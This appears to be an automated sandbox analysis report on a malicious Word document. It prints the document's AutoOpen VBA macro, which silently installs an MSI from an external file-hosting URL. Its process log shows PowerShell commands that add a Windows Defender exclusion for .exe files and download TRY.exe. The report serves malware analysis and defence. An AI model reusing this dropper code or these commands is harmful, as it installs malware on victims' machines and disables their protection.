                                                                  2022-04-20 07:18:55 UTC305INData Raw: 05 45 d3 e9 d2 b5 0b 4b 13 b2 6c c0 60 30 60 34 1a 32 1a 0d d9 db bb c4 78 bc c3 72 b5 e0 e8 f0 88 d3 e9 a9 af 87 6f 98 9e 9c b0 9c cf 89 a2 94 24 8d bd 65 91 91 a6 a9 4b 71 96 0e 29 c7 27 cf 28 19 e2 f7 6b 8d d8 18 8d c0 cd fa d3 ae 35 12 da 18 f2 bc e2 68 7a cc ed fb f7 b8 3f 3d a2 aa 0b 94 90 8c 64 c2 64 30 64 9c 66 a4 49 06 89 e4 be 5e 72 6f 7e cc d1 62 ee 42 9d 52 b5 80 a2 c1 e1 0b c1 05 b0 04 79 60 31 62 ad c9 37 ec 83 c0 fc 3e 04 10 f4 b6 41 b4 b8 a7 05 a4 12 ad af 6f b0 9c 34 c7 3c 1b 3d b7 3e d2 03 19 5f b4 ef c3 b5 70 8f cd b0 e1 a6 fb d0 59 e3 b9 18 40 18 16 ab 59 2c 56 94 65 41 5d 57 3e cb f2 7c 80 cf 45 2d 60 30 18 b3 b3 b3 cb 70 38 72 c0 b1 cf 8d 88 63 98 4c 76 e3 9d 9d 89 c5 e1 57 09 8e e9 97 38 01 10 80 bf a0 f5 b7 e5 f3 5f 98 1e d7 c5 7e
                                                                  Data Ascii: EKl`0`42xro$eKq)'(k5hz?=dd0dfI^ro~bBRy`1b7>Ao4<=>_pY@Y,VeA]W>|E-`0p8rcLvW8_~
                                                                  2022-04-20 07:18:55 UTC321INData Raw: ff 00 00 00 01 ff 00 00 ff 00 00 00 01 7f 00 00 d7 c6 00 00 03 3f 00 00 ff c6 00 00 03 ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 bf b7 0f b2 c2 c6 39 bc c8 cd 72 bc cc dc b0 c5 d0 d8 df 87 87 86 5e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 c5 be
                                                                  Data Ascii: ?( @ 9r^
                                                                  2022-04-20 07:18:56 UTC337INData Raw: c8 45 33 c9 33 c9 83 f8 7f 0f 87 1e 02 00 00 45 8b c6 41 8b d6 ff 15 d1 67 00 00 48 8b c8 48 89 05 5f 9c 00 00 ff 15 51 67 00 00 44 8d 47 04 48 8d 15 7a b2 00 00 48 8d 0d 5f 6c 00 00 e8 ca 20 00 00 85 c0 75 2d 21 7c 24 28 45 33 c9 45 33 c0 33 c9 ba b1 04 00 00 c7 44 24 20 10 00 00 00 e8 58 1e 00 00 c7 05 22 a9 00 00 14 07 07 80 e9 d3 01 00 00 8b 05 37 b2 00 00 a8 40 75 08 84 c0 0f 89 b8 00 00 00 41 b8 04 01 00 00 48 8d 54 24 30 48 8d 0d 15 6c 00 00 e8 70 20 00 00 33 c9 85 c0 75 0c 21 7c 24 28 45 33 c9 45 33 c0 eb a4 4c 8d 44 24 30 41 8b d6 ff 15 70 66 00 00 48 89 05 b9 9b 00 00 48 85 c0 74 75 ff 15 6e 65 00 00 3d b7 00 00 00 75 68 45 33 c9 4c 8d 05 e5 a8 00 00 33 c9 f6 05 c8 b1 00 00 80 74 18 21 7c 24 28 ba 4b 05 00 00 c7 44 24 20 10 00 00 00 e8 bc 1d 00
                                                                  Data Ascii: E33EAgHH_QgDGHzH_l u-!|$(E3E33D$ X"7@uAHT$0Hlp 3u!|$(E3E3LD$0ApfHHtune=uhE3L3t!|$(KD$
                                                                  2022-04-20 07:18:56 UTC353INData Raw: 98 29 00 00 49 03 dc 3c 41 74 47 3c 44 74 3a 3c 49 74 2d 3c 4e 74 20 3c 50 74 12 3c 53 74 05 41 8b f7 eb 3b 83 0d 7d 72 00 00 04 eb 2b 0f ba 2d 3f 64 00 00 07 eb 28 83 25 6a 72 00 00 fe eb 18 83 25 61 72 00 00 fd eb 0f 83 0d 24 64 00 00 40 eb 0d 09 3d 50 72 00 00 44 89 25 f5 60 00 00 8a 03 84 c0 75 95 e9 4a ff ff ff 83 4c 24 28 ff 48 8d 44 24 41 41 83 c9 ff 48 89 44 24 20 4c 8d 05 78 2d 00 00 41 8b d4 b9 7f 00 00 00 ff 15 a2 25 00 00 2b c7 0f 84 1a ff ff ff e9 12 ff ff ff 8a 44 24 42 84 c0 75 0c 66 89 3d b6 60 00 00 e9 01 ff ff ff 3c 3a 0f 85 f6 fe ff ff 48 0f be 4c 24 43 ff 15 d5 28 00 00 3c 31 74 dc 3c 41 74 09 3c 55 74 d4 e9 d9 fe ff ff 66 44 89 25 84 60 00 00 e9 cf fe ff ff 8a 44 24 42 84 c0 75 0c 44 89 25 64 60 00 00 e9 bb fe ff ff 3c 3a 0f 85 b0 fe
                                                                  Data Ascii: )I<AtG<Dt:<It-<Nt <Pt<StA;}r+-?d(%jr%ar$d@=PrD%`uJL$(HD$AAHD$ Lx-A%+D$Buf=`<:HL$C(<1t<At<UtfD%`D$BuD%d`<:
                                                                  2022-04-20 07:18:56 UTC369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 11 00 00 b7 11 00 00 90 9c 00 00 c0 11 00 00 b8 12 00 00 9c 9c 00 00 c0 12 00 00 89 14 00 00 b8 9c 00 00 90 14 00 00 53 15 00 00 dc 9c 00 00 5c 15 00 00 ef 15 00 00 f4 9c 00 00 f8 15 00 00 3c 1b 00 00 08 9d 00 00 44 1b 00 00 31 1c 00 00 2c 9d 00 00 38 1c 00 00 fa 1e 00 00 3c 9d 00 00 00 1f 00 00 ba 20 00 00 60 9d 00 00 c0 20 00 00 6c 21 00 00 80 9d 00 00 74 21 00 00 95 22 00 00 98 9d 00 00 9c 22 00 00 1e 23 00 00 a4 9d 00 00 24 23 00 00 40 24 00 00 bc 9d 00 00 48 24 00 00 21 26 00 00 d0 9d 00 00 28 26 00
                                                                  Data Ascii: DS\<D1,8< ` l!t!""#$#@$H$!&(&
                                                                  2022-04-20 07:18:56 UTC385INData Raw: 00 00 00 00 88 ff ff ff f8 8f ff 8f 8f f8 88 88 85 78 88 70 00 00 00 00 00 00 00 00 7f ff ff ff ff f8 88 88 77 78 78 77 88 7c 88 80 00 00 00 00 00 00 00 00 88 f8 88 87 77 67 77 77 78 78 88 88 88 88 88 88 00 00 00 00 00 00 00 00 78 77 87 67 67 77 87 88 88 88 88 88 88 88 78 87 00 00 00 00 00 00 00 00 78 88 77 78 88 88 f8 8f 8f 8f 8f 8f 8f 88 8c f8 80 00 00 00 00 00 00 00 88 88 87 88 ff ff ff f8 f8 f8 8f 88 88 88 88 78 70 00 00 00 00 00 00 00 78 88 78 88 f8 f8 f8 f8 f8 ff 88 f8 ff 8f 88 87 80 00 00 00 00 00 00 00 78 88 88 78 f8 ff 8f 8f f8 f8 f8 f8 88 88 88 80 00 00 00 00 00 00 00 00 88 88 78 88 ff 8f 8f f8 8f 88 88 88 88 88 88 70 00 00 00 00 00 00 00 00 87 88 80 08 88 88 88 88 88 88 88 87 87 87 87 00 00 00 00 00 00 00 00 00 00 00 00 08 88 88 88 88 78 88 88
                                                                  Data Ascii: xpwxxw|wgwwxxxwggwxxwxxpxxxxxpx
                                                                  2022-04-20 07:18:56 UTC401INData Raw: 9c 26 e7 2e 0f 83 41 64 ed 4b 21 10 ce d2 af 87 2a 80 21 97 06 0c 26 75 e7 53 53 2c 0a 72 2b d8 cc 09 a9 20 b7 01 14 52 85 ad 81 fd fe b1 a6 9f a5 f4 dc e6 fb d8 46 1f c7 24 dd 33 8f d8 9b f6 6f 9c 4e 9e 9b f4 c8 c7 db 9d 5c d7 a2 b4 2a 8b ff 34 fd fb fd c4 b8 a4 f4 e8 f7 db 27 72 20 9e 95 1e 16 8e 56 6a 04 7c 90 36 84 49 ab ad 7e f9 97 7f 73 af db ed c7 49 92 12 04 7e 11 fd 97 45 f7 e9 cc 72 6b 32 f7 9e 35 a3 91 82 a3 52 c0 88 17 20 3f f6 ad b1 7f 14 f8 97 45 4f c4 06 14 08 c8 ad cb 65 9a 2c 05 08 46 03 59 96 33 ce e5 65 4e 2b 9b 2f 1a 9a 4d 27 c3 7d e7 a1 f1 b6 e7 eb f7 22 f5 2f da a3 47 47 49 12 c5 f7 ef bf f7 fa a4 6b f3 ae 14 9c 94 2e ff 61 d9 e3 96 8e 04 5c a5 65 73 d9 28 43 21 78 67 30 88 7b 71 9c a2 86 09 30 0a 57 9f d6 64 2e 42 0b 23 de 81 5c 05
                                                                  Data Ascii: &.AdK!*!&uSS,r+ RF$3oN\*4'r Vj|6I~sI~Erk25R ?EOe,FY3eN+/M'}"/GGIk.a\es(C!xg0{q0Wd.B#\
                                                                  2022-04-20 07:18:56 UTC417INData Raw: cb 11 5e 9f 06 d3 dc 7d 41 e1 e7 48 7c a8 02 0c 7b db 36 3f 49 7f 27 7f 7e 6b ee a7 40 5d f2 e3 7d 58 6f bb be ef 4e 1d 0a 6d d6 8c 09 29 c0 5c 28 a4 d2 b1 38 2b 59 78 a1 1d 79 42 18 84 fe 0c c9 9d e8 df 91 8e 95 e4 ab bd fb 75 9b fb 70 57 37 20 f9 f5 5a 6b b2 7c c0 b0 28 28 ca 32 7c 8a 21 4a b5 45 69 09 9e 1e 40 62 a1 ca b4 8e 69 4e 6b 2d 83 c1 98 f1 b8 d8 ee f7 eb a0 b7 8d 1c bc 73 1a f0 2e 27 30 1c 0e 4d 96 65 0d e0 bb 37 a8 cb 1c 09 f4 d3 e2 02 42 33 cc d6 3f df df 6f 94 ca f9 e3 c7 8f eb a7 4f bf 12 79 5e 72 7e 71 8e 31 1b 3e f9 e4 1f 78 fa ec 2b 74 96 6f a5 37 b4 8c d6 3d 76 62 e8 2e f3 76 2d 8f fe f6 e9 dc fb d7 72 1b 6d 21 bf 07 84 41 f7 f7 ee be fb fd 13 bb d6 09 10 05 80 47 23 d1 42 d2 58 43 e3 42 bf 01 4c 28 62 2a 87 13 f2 ec 84 c6 3a 5c 63 19
                                                                  Data Ascii: ^}AH|{6?I'~k@]}XoNm)\(8+YxyBupW7 Zk|((2|!JEi@biNk-s.'0Me7B3?oOy^r~q1>x+to7=vb.v-rm!AG#BXCBL(b*:\c
                                                                  2022-04-20 07:18:56 UTC433INData Raw: c6 8a 2c 75 ae c1 aa 8a 59 c5 35 45 d5 50 d6 0d 95 cf bb 68 b4 03 41 c3 ef 61 ad 8b c8 48 e1 aa 2f f1 dd 93 94 92 48 a1 5d ca 72 a3 c1 1a e2 38 02 65 a9 6c 89 ad 0d 30 70 89 49 c6 f8 c4 a0 f0 1b 75 31 81 f3 dc 80 b3 02 20 bc 3e b3 8f 65 a3 4c fa 69 50 07 f2 78 a0 05 10 e8 1b df f8 86 00 27 0c fc fb 5f 88 2c 86 27 2e 00 4e 4e 4e 58 2c 16 5a 29 65 42 0f fc 60 5a b6 20 60 00 a2 c2 55 14 d6 25 b3 00 d6 5a ab b5 2e 8c 31 ec ed ed fd 89 37 df 7c f3 c3 ef 7c e7 3b 95 90 62 7c 7c 7c f4 d3 83 83 83 eb 42 46 51 53 e6 58 bb 39 2e bc 1f 01 e8 32 7b 77 5b d8 be 16 4a 6b c0 ab 35 ff 7d e5 5f 92 24 4c 26 13 46 a3 11 79 9e b3 58 2c 30 c6 0d f3 3c 3e 3e a2 ae 4a c6 7b 7b ae 9d b7 8c 5d f9 ae 14 a0 24 c2 0f b1 70 4c e0 46 81 c7 42 92 8c 52 46 d9 80 38 49 68 ea 86 b2 2c b0
                                                                  Data Ascii: ,uY5EPhAaH/H]r8el0pIu1 >eLiPx'_,'.NNNX,Z)eB`Z `U%Z.17||;b|||BFQSX9.2{w[Jk5}_$L&FyX,0<>>J{{]$pLFBRF8Ih,
                                                                  2022-04-20 07:18:56 UTC449INData Raw: 71 ee 07 d4 fd 94 b0 7b 35 4d 5f cb 35 a1 0b ae 25 18 2b ad 32 56 6e 1d ce d3 fe 62 11 a0 50 b0 f0 c6 1b e7 0a 07 0e 1c 7c 2f 97 9b 78 fc d2 a5 c1 7f a0 64 c2 cb f7 ef df 1f 2d f4 95 13 fb 22 53 de 38 6c 45 3a 35 8e e2 96 7e ab 2e 02 56 4a 03 ad 48 07 9d 20 a8 38 a4 94 66 62 1e b4 53 4e 5c 75 89 70 26 93 25 9f af b3 c8 78 df 17 1f 8e b6 1b 2f ff fd c4 6b a7 28 d3 7b 08 21 6b 1c e9 6e 92 81 7b 3b 43 b0 dd f6 dc cd cc 73 6f 21 52 ac 37 34 d2 d3 cb 2d a1 13 97 7a 41 91 d8 3e e0 04 14 b6 e4 70 1d 1d 96 3d 83 c2 ac 00 a5 02 82 eb d0 8d 04 28 13 28 58 0e 2c cb 81 27 03 48 0a 7c 34 3d 85 e2 f0 79 2a 6d 07 8c 72 c6 18 83 ef fb 11 61 5d d3 41 e6 27 3f f9 ce 65 00 97 33 99 cc af 00 e0 c0 81 e3 1b ec 59 eb eb 80 7a 84 52 d6 af 69 7a 2f e7 42 70 2e 44 78 0a 0f a4 f4
                                                                  Data Ascii: q{5M_5%+2VnbP|/xd-"S8lE:5~.VJH 8fbSN\up&%x/k({!kn{;Cso!R74-zA>p=((X,'H|4=y*mra]A'?e3YzRiz/Bp.Dx
                                                                  2022-04-20 07:18:56 UTC465INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 5c 5c 3f 3e 3e 3d f5 8f 87 8a ff b0 b2 b2 ff 9b ae 87 ff b2 ad 8b ff e6 e2 e1 ff ec e9 e4 ff ca c9 c7 ff 97 95 99 ff 94 90 97 ff 99 91 99 ff aa b8 c9 ff bd b9 bf ff e5 c3 c2 ff f8 f1 f1 ff c2 b7 b7 ff e4 d4 d4 ff b6 9b 9b f4 a4 85 85 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 5e 5e 40 4a 41 43 f6 7f a4 97 ff 4e e3 9d ff 77 b4 7b ff a4 9f 98 ff c7 c5 c6 ff ea e8 e7 ff da da da ff b1 b2 b2 ff 9a 98 96 ff 99 9b 9c ff 87 be e1 ff ad ba c7 ff e8 c6 c5 ff fa f2 f2 ff c2 b7 b9 ff e7 d6 d6 ff b7 9c 9c f4 a1 83 83 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 5f 5f 41 51 46 4a f6 95 c2 b0 ff 5a c7 9b ff 9d 9e 9f ff b5 b2 b4 ff ce ce ce ff f0 f0 f0 ff f0 f0 f0 ff cd cd ce ff b8 b2 ae ff a7 be ce
                                                                  Data Ascii: [\\?>>=]^^@JACNw{^__AQFJZ


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:09:19:12
                                                                  Start date:20/04/2022
                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                  Imagebase:0x13f890000
                                                                  File size:1423704 bytes
                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:2
                                                                  Start time:09:19:15
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                  Imagebase:0xff7e0000
                                                                  File size:128512 bytes
                                                                  MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:4
                                                                  Start time:09:19:19
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
                                                                  Imagebase:0x310000
                                                                  File size:73216 bytes
                                                                  MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:5
                                                                  Start time:09:19:23
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                                  Imagebase:0x6b0000
                                                                  File size:27136 bytes
                                                                  MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:7
                                                                  Start time:09:19:24
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\SysWOW64\expand.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                                  Imagebase:0xde0000
                                                                  File size:53248 bytes
                                                                  MD5 hash:659CED6D7BDA047BCC6048384231DB9F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:9
                                                                  Start time:09:19:27
                                                                  Start date:20/04/2022
                                                                  Path:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
                                                                  Imagebase:0x13fb60000
                                                                  File size:155136 bytes
                                                                  MD5 hash:96DF7B0C491646EFC2E5F2E9F0443B8B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:10
                                                                  Start time:09:19:30
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd /c thai.bat
                                                                  Imagebase:0x4a1d0000
                                                                  File size:345088 bytes
                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:12
                                                                  Start time:09:19:31
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell -command "Set-MpPreference -ExclusionExtension ".exe"
                                                                  Imagebase:0x13f770000
                                                                  File size:473600 bytes
                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:13
                                                                  Start time:09:19:34
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
                                                                  Imagebase:0x13f910000
                                                                  File size:473600 bytes
                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:15
                                                                  Start time:09:19:38
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                                  Imagebase:0xee0000
                                                                  File size:27136 bytes
                                                                  MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:17
                                                                  Start time:09:19:46
                                                                  Start date:20/04/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                  Imagebase:0xffa50000
                                                                  File size:45568 bytes
                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Call Graph

                                                                  • Entrypoint
                                                                  • Decryption Function
                                                                  • Executed
                                                                  • Not Executed
                                                                  • Show Help
                                                                  callgraph 9 AutoOpen CreateObject:1

                                                                  Module: ThisDocument

                                                                  Declaration
                                                                  LineContent
                                                                  1

                                                                  Attribute VB_Name = "ThisDocument"

                                                                  2

                                                                  Attribute VB_Base = "1Normal.ThisDocument"

                                                                  3

                                                                  Attribute VB_GlobalNameSpace = False

                                                                  4

                                                                  Attribute VB_Creatable = False

                                                                  5

                                                                  Attribute VB_PredeclaredId = True

                                                                  6

                                                                  Attribute VB_Exposed = True

                                                                  7

                                                                  Attribute VB_TemplateDerived = True

                                                                  8

                                                                  Attribute VB_Customizable = True

                                                                  Executed Functions

                                                                  Subroutine

                                                                  AutoOpenAPIs: 3, Strings: 3, Number of lines: 7, Relevance: 16.007

                                                                  APIsMeta Information

                                                                  CreateObject

                                                                  		CreateObject("WindowsInstaller.Installer")

                                                                  UILevel

                                                                  InstallProduct

                                                                  StringsDecrypted Strings
                                                                  "WindowsInstaller.Installer"
                                                                  """"
                                                                  "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi"
                                                                  LineInstructionMeta Information
                                                                  9

                                                                  Sub AutoOpen()

                                                                  10

                                                                  On Error Resume Next

                                                                  executed
                                                                  11

                                                                  Dim msi as Object

                                                                  12

                                                                  Set msi = CreateObject("WindowsInstaller.Installer")

                                                                  CreateObject("WindowsInstaller.Installer")

                                                                  executed
                                                                  13

                                                                  msi.UILevel = 2

                                                                  UILevel

                                                                  15

                                                                  msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", ""

                                                                  InstallProduct

                                                                  16

                                                                  End Sub

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:27.8%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:43.5%
                                                                    Total number of Nodes:910
                                                                    Total number of Limit Nodes:46
                                                                    execution_graph 2044 13fb67960 __getmainargs 2910 13fb63720 2911 13fb63743 2910->2911 2912 13fb63801 2910->2912 2911->2912 2913 13fb63758 2911->2913 2914 13fb63809 GetDesktopWindow 2911->2914 2915 13fb638e8 EndDialog 2912->2915 2920 13fb63764 2912->2920 2917 13fb63785 2913->2917 2918 13fb6375c 2913->2918 2932 13fb64938 6 API calls 2914->2932 2915->2920 2917->2920 2922 13fb6378f ResetEvent 2917->2922 2918->2920 2921 13fb6376b TerminateThread 2918->2921 2921->2915 2925 13fb64a70 24 API calls 2922->2925 2923 13fb63875 SetWindowTextA CreateThread 2923->2920 2926 13fb638b6 2923->2926 2924 13fb6382a GetDlgItem SendMessageA GetDlgItem SendMessageA 2924->2923 2927 13fb637c7 2925->2927 2928 13fb64a70 24 API calls 2926->2928 2929 13fb637e2 SetEvent 2927->2929 2930 13fb637d0 SetEvent 2927->2930 2928->2912 2931 13fb63908 4 API calls 2929->2931 2930->2920 2931->2912 2934 13fb649eb SetWindowPos 2932->2934 2935 13fb67c20 7 API calls 2934->2935 2936 13fb63821 2935->2936 2936->2923 2936->2924 2937 13fb682e0 _XcptFilter 2938 13fb63260 2939 13fb6327b CallWindowProcA 2938->2939 2940 13fb6326c 2938->2940 2941 13fb63277 2939->2941 2940->2939 2940->2941 2942 13fb651e0 2943 13fb65241 ReadFile 2942->2943 2944 13fb6520d 2942->2944 2943->2944 2945 13fb61490 2946 13fb614e1 GetDesktopWindow 2945->2946 2947 13fb614c0 2945->2947 2949 13fb64938 14 API calls 2946->2949 2948 13fb614dd 2947->2948 2950 13fb614d2 EndDialog 2947->2950 2952 13fb67c20 7 API calls 2948->2952 2951 13fb614f2 LoadStringA SetDlgItemTextA MessageBeep 2949->2951 2950->2948 2951->2948 2953 13fb61542 2952->2953 2954 13fb67110 2955 13fb6715d 2954->2955 2956 13fb673cc CharPrevA 2955->2956 2957 13fb67195 CreateFileA 2956->2957 2958 13fb671d8 WriteFile 2957->2958 2959 13fb671ca 2957->2959 2960 13fb671f6 CloseHandle 2958->2960 2962 13fb67c20 7 API calls 2959->2962 2960->2959 2963 13fb67223 2962->2963 2964 13fb65450 GlobalAlloc 2965 13fb67bc9 2966 13fb67bd8 _exit 2965->2966 2967 13fb67be1 2965->2967 2966->2967 2968 13fb67bf6 2967->2968 2969 13fb67bea _cexit 2967->2969 2969->2968 2045 13fb65480 2046 13fb654d4 2045->2046 2047 13fb654be 2045->2047 2048 13fb654cc 2046->2048 2051 13fb655e1 2046->2051 2054 13fb654ea 2046->2054 2047->2048 2049 13fb65350 CloseHandle 2047->2049 2101 13fb67c20 2048->2101 2049->2048 2052 13fb655ed SetDlgItemTextA 2051->2052 2055 13fb655fc 2051->2055 2052->2055 2054->2048 2056 13fb65552 DosDateTimeToFileTime 2054->2056 2055->2048 2073 13fb64e00 GetFileAttributesA 2055->2073 2056->2048 2058 13fb6556d LocalFileTimeToFileTime 2056->2058 2058->2048 2060 13fb65585 SetFileTime 2058->2060 2060->2048 2061 13fb655a7 2060->2061 2070 13fb65350 2061->2070 2065 13fb65673 2092 13fb64eb0 LocalAlloc 2065->2092 2068 13fb6567d 2068->2048 2071 13fb65384 CloseHandle 2070->2071 2072 13fb6536f SetFileAttributesA 2070->2072 2071->2072 2072->2048 2074 13fb64e18 2073->2074 2076 13fb64e93 2073->2076 2075 13fb64e80 SetFileAttributesA 2074->2075 2074->2076 2109 13fb67304 FindResourceA 2074->2109 2075->2076 2076->2048 2080 13fb64fa0 2076->2080 2079 13fb64e76 2079->2075 2081 13fb64fd3 2080->2081 2082 13fb64ff0 2081->2082 2083 13fb6501d lstrcmpA 2081->2083 2085 13fb64a70 24 API calls 2082->2085 2084 13fb65014 2083->2084 2086 13fb6506e 2083->2086 2084->2048 2084->2065 2085->2084 2086->2084 2087 13fb650c2 CreateFileA 2086->2087 2087->2084 2089 13fb650f2 2087->2089 2088 13fb65169 CreateFileA 2088->2084 2089->2084 2089->2088 2090 13fb65157 CharNextA 2089->2090 2091 13fb65146 CreateDirectoryA 2089->2091 2090->2089 2091->2090 2093 13fb64ed8 2092->2093 2095 13fb64f02 2092->2095 2094 13fb64a70 24 API calls 2093->2094 2096 13fb64efb 2094->2096 2095->2095 2097 13fb64f12 LocalAlloc 2095->2097 2096->2068 2097->2096 2098 13fb64f28 2097->2098 2099 13fb64a70 24 API calls 2098->2099 2100 13fb64f4b LocalFree 2099->2100 2100->2096 2102 13fb67c29 2101->2102 2103 13fb67c80 RtlCaptureContext RtlLookupFunctionEntry 2102->2103 2104 13fb656a6 2102->2104 2105 13fb67d07 2103->2105 2106 13fb67cc5 RtlVirtualUnwind 2103->2106 2164 13fb67c44 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2105->2164 2106->2105 2110 13fb67387 2109->2110 2111 13fb67339 LoadResource 2109->2111 2117 13fb64a70 2110->2117 2111->2110 2114 13fb6734d DialogBoxIndirectParamA FreeResource 2111->2114 2114->2110 2115 13fb64e62 2114->2115 2115->2075 2115->2076 2115->2079 2118 13fb64c95 2117->2118 2119 13fb64aed LoadStringA 2117->2119 2120 13fb67c20 7 API calls 2118->2120 2121 13fb64b11 2119->2121 2122 13fb64b4d 2119->2122 2124 13fb64ca6 2120->2124 2146 13fb676d8 2121->2146 2125 13fb64bc0 2122->2125 2132 13fb64b59 LocalAlloc 2122->2132 2124->2115 2129 13fb64c17 LocalAlloc 2125->2129 2130 13fb64bd3 LocalAlloc 2125->2130 2127 13fb64b1f MessageBoxA 2127->2118 2129->2118 2141 13fb64bbe 2129->2141 2130->2118 2135 13fb64c02 2130->2135 